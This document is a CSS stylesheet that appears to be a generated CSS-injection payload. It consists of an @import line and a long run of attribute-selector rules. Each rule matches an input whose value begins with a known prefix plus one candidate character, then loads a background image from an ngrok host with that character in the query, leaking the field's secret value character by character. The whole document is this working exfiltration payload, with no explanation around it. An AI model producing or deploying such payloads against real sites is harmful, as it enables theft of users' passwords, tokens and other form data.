@import url("http://bc0a37bcf1d5.ngrok.io/?l=11");
input[value="ovojemoja!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.2967307288897838");}
input[value="ovojemoja\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.13251124893547805");}
input[value="ovojemoja#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.825300935693948");}
input[value="ovojemoja$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.8748728253286575");}
input[value="ovojemoja%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.16585220299645176");}
input[value="ovojemoja&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.4352082146813028");}
input[value="ovojemoja'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.8658302612703221");}
input[value="ovojemoja("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.07791181355949539");}
input[value="ovojemoja)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.3677250395569154");}
input[value="ovojemoja*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.11613797315914187");}
input[value="ovojemoja+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.613300368113844");}
input[value="ovojemoja,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.565194120944633");}
input[value="ovojemoja-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.9176605796542743");}
input[value="ovojemoja."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.2972381042993957");}
input[value="ovojemoja/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.42577244429828953");}
input[value="ovojemoja0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.7280506297376077");}
input[value="ovojemoja1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.833273585858753");}
input[value="ovojemoja2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.25872709077174316");}
input[value="ovojemoja3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.7830062041238566");}
input[value="ovojemoja4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.7136336345370542");}
input[value="ovojemoja5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.6315969475923782");}
input[value="ovojemoja6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.2917919011461416");}
input[value="ovojemoja7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.12840145522938817");}
input[value="ovojemoja8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.1704275537296942");}
input[value="ovojemoja9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.7953785956755035");}
input[value="ovojemoja:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.6291620754665896");}
input[value="ovojemoja;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.08674707990655883");}
input[value="ovojemoja<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.13272375617709398");}
input[value="ovojemoja="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.11308575577053537");}
input[value="ovojemoja>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.30000178912685005");}
input[value="ovojemoja?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.2717692449255631");}
input[value="ovojemoja@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.4874557864075528");}
input[value="ovojemojaA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.4407866888213472");}
input[value="ovojemojaB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.3047337999797364");}
input[value="ovojemojaC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.8934286931816995");}
input[value="ovojemojaD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.018573752874480487");}
input[value="ovojemojaE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.18874383733580857");}
input[value="ovojemojaF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.7115350444646582");}
input[value="ovojemojaG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.4125277276614028");}
input[value="ovojemojaH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.30712145367466226");}
input[value="ovojemojaI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.6505481880333632");}
input[value="ovojemojaJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.3222426211522489");}
input[value="ovojemojaK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.5910582376127367");}
input[value="ovojemojaL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.18005060192529077");}
input[value="ovojemojaM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.9560350930535324");}
input[value="ovojemojaN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.7040644952383655");}
input[value="ovojemojaO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.020448583790456887");}
input[value="ovojemojaP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.03745677762227717");}
input[value="ovojemojaQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.7774162651969827");}
input[value="ovojemojaR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.8713269409024367");}
input[value="ovojemojaS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.714265420621452");}
input[value="ovojemojaT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.40269309945382314");}
input[value="ovojemojaU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.18242162648093285");}
input[value="ovojemojaV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.059238223288823555");}
input[value="ovojemojaW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.16811659754806962");}
input[value="ovojemojaX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.8269775790809186");}
input[value="ovojemojaY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.2854600997899117");}
input[value="ovojemojaZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.4024057622154118");}
input[value="ovojemoja["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.6561756774990253");}
input[value="ovojemoja\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.004257769021275726");}
input[value="ovojemoja]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.9723984473441987");}
input[value="ovojemoja^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.6532229725954526");}
input[value="ovojemoja_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.17900520716012758");}
input[value="ovojemoja`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.26854798201269814");}
input[value="ovojemojaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.28860633862347096");}
input[value="ovojemojab"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.3233497523536162");}
input[value="ovojemojac"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.3883224905188838");}
input[value="ovojemojad"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.7669293362954257");}
input[value="ovojemojae"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.008447334376108673");}
input[value="ovojemojaf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.8371130710405872");}
input[value="ovojemojag"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.44786687390323343");}
input[value="ovojemojah"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.6460066948052301");}
input[value="ovojemojai"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.36848937704586704");}
input[value="ovojemojaj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.7934481090465835");}
input[value="ovojemojak"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.834875045854258");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.5431708702059117");}
input[value="ovojemojam"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.39155804631267666");}
input[value="ovojemojan"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.8632079952682208");}
input[value="ovojemojao"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.4884827112081367");}
input[value="ovojemojap"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.540981660206715");}
input[value="ovojemojaq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.7570032092122607");}
input[value="ovojemojar"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.28409123007231396");}
input[value="ovojemojas"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.12623469744990512");}
input[value="ovojemojat"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.14974766236145998");}
input[value="ovojemojau"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.04420053834732851");}
input[value="ovojemojav"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.7540763457448649");}
input[value="ovojemojaw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.9488857122215346");}
input[value="ovojemojax"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.08050034817157714");}
input[value="ovojemojay"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.835499812592613");}
input[value="ovojemojaz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.47154992212276503");}
input[value="ovojemoja{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.03794364972924935");}
input[value="ovojemoja|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.4540866785032973");}
input[value="ovojemoja}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.627329698314087");}
input[value="ovojemoja~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.6232505474408401");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5329474767282523");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9356962316609689");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.07963278166629828");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7809106879824741");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9951983461077611");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7608044693689493");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9407693536709469");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6899725799173493");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.03632206683746153");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8837222517058725");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2351786644392626");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.48436490981487346");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9445078726214151");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.021170193665497994");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7596924534258565");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.37660513432185616");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8547277158168589");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9482764627607485");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8815362764214116");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.49039360031678925");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9154544704453125");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5302713924315678");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8655736134902898");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9325033027679797");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.251499915014157");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.09117945764541746");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8190470911598997");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7090904586004911");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6075361532098338");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.45991767251593707");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5689585473075129");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9173700588431006");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.26303922446695305");}
input[value="ovojemoja "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.7065520721830307");}
input[value="ovojemoja¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.8476248407541136");}
input[value="ovojemoja¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.8990787729204162");}
input[value="ovojemoja£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.7165157066777441");}
input[value="ovojemoja¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.6187285404176068");}
input[value="ovojemoja¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.8833794580936991");}
input[value="ovojemoja¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.419247211247207");}
input[value="ovojemoja§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.583640043705504");}
input[value="ovojemoja¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.05107484811478891");}
input[value="ovojemoja©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.934870902688741");}
input[value="ovojemojaª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.4726346028560562");}
input[value="ovojemoja«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.32987023801325166");}
input[value="ovojemoja¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.46787519530924015");}
input[value="ovojemoja­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.11526286747237169");}
input[value="ovojemoja®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.5878048044162425");}
input[value="ovojemoja¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.25357220219230214");}
input[value="ovojemoja°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.2970235158437571");}
input[value="ovojemoja±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.049497008136177634");}
input[value="ovojemoja²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.39587956282781067");}
input[value="ovojemoja³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.7521180372232479");}
input[value="ovojemoja´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.22450573774111082");}
input[value="ovojemojaµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.9177885628922084");}
input[value="ovojemoja¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.09349520411754386");}
input[value="ovojemoja·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.20126760140327393");}
input[value="ovojemoja¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.5063704807530123");}
input[value="ovojemoja¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.9006457835240107");}
input[value="ovojemojaº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.43629789838706046");}
input[value="ovojemoja»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.8758697114626062");}
input[value="ovojemoja¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.12284217042143641");}
input[value="ovojemoja½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.7821412653584219");}
input[value="ovojemoja¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.3306225940339451");}
input[value="ovojemoja¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.5266424377943753");}
input[value="ovojemojaÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.40431795351490596");}
input[value="ovojemojaÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.9237506289150301");}
input[value="ovojemojaÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.9521663714766115");}
input[value="ovojemojaÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.6689556148657658");}
input[value="ovojemojaÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.5996451650838903");}
input[value="ovojemojaÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.8966381591129602");}
input[value="ovojemojaÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.8691511246483183");}
input[value="ovojemojaÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.3932603951707916");}
input[value="ovojemojaÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.1137098182698617");}
input[value="ovojemojaÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.4641779378736044");}
input[value="ovojemojaÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.9841617796907003");}
input[value="ovojemojaË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.4537810166601879");}
input[value="ovojemojaÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.5497030115624728");}
input[value="ovojemojaÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.7895770466783327");}
input[value="ovojemojaÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.8447356816275888");}
input[value="ovojemojaÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.3382598529959142");}
input[value="ovojemojaÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.05755872316145938");}
input[value="ovojemojaÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.7365208860358661");}
input[value="ovojemojaÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.6118662433287059");}
input[value="ovojemojaÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.909622450437054");}
input[value="ovojemojaÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.5925118694269216");}
input[value="ovojemojaÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.8083349040057881");}
input[value="ovojemojaÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.5915439291829323");}
input[value="ovojemoja×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.8967176533468715");}
input[value="ovojemojaØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.13708349798039743");}
input[value="ovojemojaÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.21967999553479922");}
input[value="ovojemojaÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.41509495602593116");}
input[value="ovojemojaÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.8418811145081233");}
input[value="ovojemojaÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.8947283588285557");}
input[value="ovojemojaÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.41005807921707893");}
input[value="ovojemojaÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.24609097680312875");}
input[value="ovojemojaß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.9390203807967559");}
input[value="ovojemojaà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.5869507011532957");}
input[value="ovojemojaá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.6340016101033972");}
input[value="ovojemojaâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.7131050939725165");}
input[value="ovojemojaã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.8634190317522106");}
input[value="ovojemojaä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.26709641624345015");}
input[value="ovojemojaå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.5698268887499609");}
input[value="ovojemojaæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.3923286076868746");}
input[value="ovojemojaç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.5937655250527791");}
input[value="ovojemojaè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.02309688237574936");}
input[value="ovojemojaé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.27756569986928104");}
input[value="ovojemojaê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.4729878149701563");}
input[value="ovojemojaë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.5127113815842466");}
input[value="ovojemojaì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.06128787611915154");}
input[value="ovojemojaí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.9016321637167082");}
input[value="ovojemojaî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.7550213367428404");}
input[value="ovojemojaï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.7872717475095996");}
input[value="ovojemojað"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.17676676904617783");}
input[value="ovojemojañ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.8158267044454715");}
input[value="ovojemojaò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.5841509001614014");}
input[value="ovojemojaó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.4184548389989675");}
input[value="ovojemojaô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.9990915252507981");}
input[value="ovojemojaõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.33561501030329755");}
input[value="ovojemojaö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.8162923031491658");}
input[value="ovojemoja÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.37650878577015456");}
input[value="ovojemojaø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.23915107252440748");}
input[value="ovojemojaù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.7004251161555257");}
input[value="ovojemojaú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.3816403117806779");}
input[value="ovojemojaû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.9380160281431624");}
input[value="ovojemojaü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.9157354396591562");}
input[value="ovojemojaý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.8165139129859742");}
input[value="ovojemojaþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.35954518118003254");}
input[value="ovojemojaÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.7229752308084496");}
